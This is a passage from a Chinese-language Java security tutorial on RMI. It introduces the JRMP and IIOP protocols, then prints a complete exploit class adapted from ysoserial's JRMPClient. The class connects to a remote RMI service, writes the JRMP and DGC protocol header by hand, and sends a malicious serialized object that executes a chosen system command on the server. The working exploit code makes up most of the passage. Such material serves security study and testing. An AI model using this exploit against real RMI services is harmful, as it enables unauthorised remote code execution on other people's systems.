RMP接口的两种常见实现方式:

    1. JRMP协议(Java Remote Message Protocol)RMI专用的Java远程消息交换协议
    2. IIOP协议(Internet Inter-ORB Protocol) ,基于 CORBA 实现的对象请求代理协议。

    由于RMI数据通信大量的使用了Java的对象反序列化,所以在使用RMI客户端去攻击RMI服务端时需要特别小心,如果本地RMI客户端刚好符合反序列化攻击的利用条件,那么RMI服务端返回一个恶意的反序列化攻击包可能会导致我们被反向攻击。

    我们可以通过和RMI服务端建立Socket连接并使用RMIJRMP协议发送恶意的序列化包,RMI服务端在处理JRMP消息时会反序列化消息对象,从而实现RCE

    JRMP客户端反序列化攻击示例代码:

    1. package com.anbai.sec.rmi;
    3. import sun.rmi.server.MarshalOutputStream;
    4. import sun.rmi.transport.TransportConstants;
    6. import java.io.DataOutputStream;
    7. import java.io.IOException;
    8. import java.io.ObjectOutputStream;
    9. import java.io.OutputStream;
    10. import java.net.Socket;
    12. import static com.anbai.sec.rmi.RMIServerTest.RMI_HOST;
    13. import static com.anbai.sec.rmi.RMIServerTest.RMI_PORT;
    15. /**
    16.  * 利用RMI的JRMP协议发送恶意的序列化包攻击示例,该示例采用Socket协议发送序列化数据,不会反序列化RMI服务器端的数据,
    17.  * 所以不用担心本地被RMI服务端通过构建恶意数据包攻击,示例程序修改自ysoserial的JRMPClient:https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/exploit/JRMPClient.java
    18.  */
    19. public class JRMPExploit {
    21.    public static void main(String[] args) throws IOException {
    22.       if (args.length == 0) {
    23.          // 如果不指定连接参数默认连接本地RMI服务
    24.          args = new String[]{RMI_HOST, String.valueOf(RMI_PORT), "open -a Calculator.app"};
    25.       }
    27.       // 远程RMI服务IP
    28.       final String host = args[0];
    30.       // 远程RMI服务端口
    31.       final int port = Integer.parseInt(args[1]);
    33.       // 需要执行的系统命令
    34.       final String command = args[2];
    36.       // Socket连接对象
    37.       Socket socket = null;
    39.       // Socket输出流
    40.       OutputStream out = null;
    42.       try {
    43.          // 创建恶意的Payload对象
    44.          Object payloadObject = RMIExploit.genPayload(command);
    46.          // 建立和远程RMI服务的Socket连接
    47.          socket = new Socket(host, port);
    48.          socket.setKeepAlive(true);
    49.          socket.setTcpNoDelay(true);
    51.          // 获取Socket的输出流对象
    52.          out = socket.getOutputStream();
    54.          // 将Socket的输出流转换成DataOutputStream对象
    55.          DataOutputStream dos = new DataOutputStream(out);
    57.          // 创建MarshalOutputStream对象
    58.          ObjectOutputStream baos = new MarshalOutputStream(dos);
    60.          // 向远程RMI服务端Socket写入RMI协议并通过JRMP传输Payload序列化对象
    61.          dos.writeInt(TransportConstants.Magic);// 魔数
    62.          dos.writeShort(TransportConstants.Version);// 版本
    63.          dos.writeByte(TransportConstants.SingleOpProtocol);// 协议类型
    64.          dos.write(TransportConstants.Call);// RMI调用指令
    65.          baos.writeLong(2); // DGC
    66.          baos.writeInt(0);
    67.          baos.writeLong(0);
    68.          baos.writeShort(0);
    69.          baos.writeInt(1); // dirty
    70.          baos.writeLong(-669196253586618813L);// 接口Hash值
    72.          // 写入恶意的序列化对象
    73.          baos.writeObject(payloadObject);
    75.          dos.flush();
    76.       } catch (Exception e) {
    77.          e.printStackTrace();
    78.       } finally {
    79.          // 关闭Socket输出流
    80.          if (out != null) {
    81.             out.close();
    82.          }
    84.          // 关闭Socket连接
    85.          if (socket != null) {
    86.             socket.close();
    87.          }
    88.       }
    89.    }
    91. }

    测试流程同上面的RMIExploit,这里不再赘述。